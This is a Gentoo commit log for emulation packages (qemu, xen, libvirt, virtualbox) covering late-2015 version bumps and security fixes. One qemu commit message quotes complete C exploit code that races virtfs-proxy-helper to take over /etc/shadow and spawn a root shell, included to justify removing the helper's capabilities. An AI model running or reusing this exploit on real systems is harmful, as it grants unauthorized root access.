summaryrefslogtreecommitdiff
Commit message (Collapse)AuthorAgeFilesLines
* app-emulation/xen: revbump to vn. 4.6.0-r5Ian Delaney2016-01-032-0/+191
| | | | | | | | wrt security patch in the gentoo bug Gentoo bug: #569554 Package-Manager: portage-2.2.26
* app-emulation/open-vm-tools: Fix building with latest glibmm/libsigc++ (#570418)Pacho Ramos2016-01-011-0/+4
| | | | Package-Manager: portage-2.2.26
* app-emulation/wine: Resolve bug #566036 for 9999NP-Hardass2015-12-312-2/+2
| | | | Package-Manager: portage-2.2.25
* app-emulation/xen-tools: Make use of new python_gen_impl_dep functionMichał Górny2015-12-316-8/+8
|
* Remove hardmasked for removal packagesPacho Ramos2015-12-313-33/+0
|
* clean unused use flagMichael Sterrett2015-12-291-1/+0
| | | | Package-Manager: portage-2.2.24
* oldMichael Sterrett2015-12-295-220/+0
| | | | Package-Manager: portage-2.2.24
* app-emulation/lxd: remove oldErik Mackdanz2015-12-286-257/+0
| | | | Package-Manager: portage-2.2.26
* app-emulation/lxd: bump to 0.25Erik Mackdanz2015-12-286-0/+266
| | | | Package-Manager: portage-2.2.26
* app-emulation/docker-swarm: version bump to 1.0.1Zac Medico2015-12-272-0/+38
| | | | Package-Manager: portage-2.2.26
* app-emulation/docker-machine: version bump to 0.5.4Zac Medico2015-12-272-0/+42
| | | | Package-Manager: portage-2.2.26
* app-emulation/libvirt-glib: version bump to 0.2.3Matthias Maier2015-12-272-0/+54
| | | | | | Thanks to Dessa for pointing this out. Package-Manager: portage-2.2.26
* app-emulation/xen: add msg in pkg_postinst to all vns. 4.5 4.5 re xen-symsIan Delaney2015-12-274-0/+17
| | | | | | | | | Prompt from user in bug #552424 to make install of /boot/xen-syms optional, done by informing user via msg in pkg_postinst to do this using INSTALL_MASK Gentoo bug: #552424 Package-Manager: portage-2.2.24
* app-emulation/virt-manager: drop version 1.3.1 (bug 569644)Matthias Maier2015-12-272-106/+0
| | | | | | | | | Version 1.3.1 had a too restrictive check for x11-libs/vte:2.91. Fixed by upstream in 1.3.2 Gentoo-Bugs: 569644 Package-Manager: portage-2.2.26
* app-emulation/libvirt: version bump to 1.3.0, provde service file for virtlogdMatthias Maier2015-12-276-3/+428
| | | | | | | | | - Bump to version 1.3.0 (including backport for CVE-2015-5313) - Add runscript for freshly introduce virtlogd Gentoo-Bugs: 569526, 568860, 567152 Package-Manager: portage-2.2.26
* app-emulation/libvirt: Install all docs under /usr/share/doc/${PF} (bug 569526)Matthias Maier2015-12-272-4/+2
| | | | | | | Gentoo-Bug: 569526 Package-Manager: portage-2.2.26 Signed-off-by: Matthias Maier <tamiko@gentoo.org>
* app-emulation/virt-manager: Version bumpManuel Rüger2015-12-262-0/+106
| | | | Package-Manager: portage-2.2.26
* app-emulation/vice: ppc stable wrt bug #568078Agostino Sarubbo2015-12-261-1/+1
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="ppc" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/spice-protocol: ppc stable wrt bug #566156Agostino Sarubbo2015-12-261-1/+1
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="ppc" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/cloud-init: x86 stable wrt bug #568596Agostino Sarubbo2015-12-251-1/+1
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="x86" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/vice: x86 stable wrt bug #568078Agostino Sarubbo2015-12-251-1/+1
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="x86" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/xen-tools: clean vn. 4.5.2-r1 re sec bug #566842Ian Delaney2015-12-232-467/+0
| | | | Package-Manager: portage-2.2.24
* app-emulation/xen: clean vn. 4.5.2-r1 re sec bug #566842Ian Delaney2015-12-232-182/+0
| | | | Package-Manager: portage-2.2.24
* app-emulation/virt-manager: Version bumpManuel Rüger2015-12-222-0/+106
| | | | | | Gentoo-Bug: #568154 Package-Manager: portage-2.2.26
* app-emulation/libvirt-glib: remove old versions 0.2.0, 0.2.1Matthias Maier2015-12-223-109/+0
| | | | Package-Manager: portage-2.2.26
* app-emulation/libvirt: remove vulnerable 1.2.18 (CVE-2015-5313, bug #568870)Matthias Maier2015-12-224-663/+0
| | | | | | | | This is a cleanup for CVE-2015-5313 bug 568870. Gentoo-Bugs: 568870 Package-Manager: portage-2.2.26
* app-emulation/libvirt: x86 stable wrt bug #568870Agostino Sarubbo2015-12-221-1/+1
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="x86" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/libvirt: amd64 stable wrt bug #568870Agostino Sarubbo2015-12-221-1/+1
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/xen-tools: amd64 stable wrt bug #566842Agostino Sarubbo2015-12-221-1/+1
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/libvirt: remove vuln. 1.2.(20|21) (CVE-2015-5313, bug #568870)Matthias Maier2015-12-223-763/+0
| | | | | | | | This is a cleanup for CVE-2015-5313 bug 568870. Gentoo-Bugs: 568870 Package-Manager: portage-2.2.26
* app-emulation/libvirt: security fix for 1.2.21 (CVE-2015-5313, bug #568870)Matthias Maier2015-12-222-1/+2
| | | | | | | | | | | | Apply fix for CVE-2015-5313 to 1.2.21: A path-traversal flaw was found in the way the libvirt daemon handled file-system names for storage volumes. A libvirt user with privileges to create storage volumes and without privileges to create and modify domains could possibly use this flaw to escalate their privileges. Gentoo-Bug: 568870 Package-Manager: portage-2.2.26
* app-emulation/cloud-init: amd64 stable wrt bug #568596Agostino Sarubbo2015-12-211-1/+1
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* virtualbox packages: Removed old.Lars Wendler2015-12-2112-1139/+0
| | | | | Package-Manager: portage-2.2.26 Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
* virtualbox packages: Bump to version 5.0.12Lars Wendler2015-12-2112-0/+1139
| | | | | Package-Manager: portage-2.2.26 Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
* app-emulation/qemu: disable libgcrypt usage #568856Mike Frysinger2015-12-202-0/+12
|
* clean out unused use flagsMichael Sterrett2015-12-171-2/+0
| | | | Package-Manager: portage-2.2.24
* clean oldMichael Sterrett2015-12-176-316/+0
| | | | Package-Manager: portage-2.2.24
* app-emulation/qemu: drop versions <2.4.1-r2Mike Frysinger2015-12-1738-9482/+0
|
* app-emulation/qemu-guest-agent: version bump to 2.5.0Mike Frysinger2015-12-172-0/+89
|
* app-emulation/qemu: version bump to 2.5.0Mike Frysinger2015-12-172-0/+646
|
* app-emulation/xen: revbumps to vns. 4.5.2-r3, 4.6.0-r4Ian Delaney2015-12-173-0/+376
| | | | | | | | security patches added of xsa 164,165,166 re security Bug 567962 Gentoo bug: #567962 Package-Manager: portage-2.2.24
* app-emulation/xen-tools: revbumps to vns. 4.5.2-r3, 4.6.0-r5Ian Delaney2015-12-173-0/+937
| | | | | | | | | security patches added of xsa 164,165,166, and those effecting qemu (4) from xsa-155 re security Bug 567962 Gentoo bug: #567962 Package-Manager: portage-2.2.24
* app-emulation/qemu: x86 stable wrt bug #567828Agostino Sarubbo2015-12-161-1/+1
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="x86" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/qemu: amd64 stable wrt bug #567828Agostino Sarubbo2015-12-161-1/+1
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/qemu: add upstream fixes for #567828 #568214Mike Frysinger2015-12-153-0/+750
|
* app-emulation/qemu: drop virtfs-proxy-helper fcaps from all versions #568226Mike Frysinger2015-12-159-36/+0
|
* app-emulation/crossover-bin: Bump to 15.0.0Richard Yao2015-12-142-0/+142
| | | | | Package-Manager: portage-2.2.20.1 Signed-off-by: Richard Yao <ryao@gentoo.org>
* app-emulation/vice: amd64 stable wrt bug #568078Agostino Sarubbo2015-12-141-1/+1
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/xen: amd64 stable wrt bug #566842Agostino Sarubbo2015-12-141-1/+1
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/qemu: critical security fixJason A. Donenfeld2015-12-144-0/+2495
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | The virtfs-proxy-helper program is not a safe binary to give caps. The following exploit code demonstrates the vulnerability: ~=~=~=~= snip ~=~=~=~= /* == virtfshell == * * Some distributions make virtfs-proxy-helper from QEMU either SUID or * give it CAP_CHOWN fs capabilities. This is a terrible idea. While * virtfs-proxy-helper makes some sort of flimsy check to make sure * its socket path doesn't already exist, it is vulnerable to TOCTOU. * * This should spawn a root shell eventually on vulnerable systems. * * - zx2c4 * 2015-12-12 * * * zx2c4@thinkpad ~ $ lsb_release -i * Distributor ID: Gentoo * zx2c4@thinkpad ~ $ ./virtfshell * == Virtfshell - by zx2c4 == * [+] Beginning race loop * [+] Chown'd /etc/shadow, elevating to root * [+] Cleaning up * [+] Spawning root shell * thinkpad zx2c4 # whoami * root * */ #include <stdio.h> #include <sys/wait.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/inotify.h> #include <unistd.h> #include <stdlib.h> #include <signal.h> static int it_worked(void) { struct stat sbuf = { 0 }; stat("/etc/shadow", &sbuf); return sbuf.st_uid == getuid() && sbuf.st_gid == getgid(); } int main(int argc, char **argv) { int fd; pid_t pid; char uid[12], gid[12]; sprintf(uid, "%d", getuid()); sprintf(gid, "%d", getgid()); printf("== Virtfshell - by zx2c4 ==\n"); printf("[+] Beginning race loop\n"); while (!it_worked()) { fd = inotify_init(); unlink("/tmp/virtfshell/sock"); mkdir("/tmp/virtfshell", 0777); inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE); pid = fork(); if (!pid) { close(0); close(1); close(2); execlp("virtfs-proxy-helper", "virtfs-proxy-helper", "-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", NULL); _exit(1); } read(fd, 0, 0); unlink("/tmp/virtfshell/sock"); symlink("/etc/shadow", "/tmp/virtfshell/sock"); close(fd); kill(pid, SIGKILL); wait(NULL); } printf("[+] Chown'd /etc/shadow, elevating to root\n"); system( "cp /etc/shadow /tmp/original_shadow;" "sed 's/^root:.*/root::::::::/' /etc/shadow > /tmp/modified_shadow;" "cat /tmp/modified_shadow > /etc/shadow;" "su -c '" " echo [+] Cleaning up;" " cat /tmp/original_shadow > /etc/shadow;" " chown root:root /etc/shadow;" " rm /tmp/modified_shadow /tmp/original_shadow;" " echo [+] Spawning root shell;" " exec /bin/bash -i" "'"); return 0; }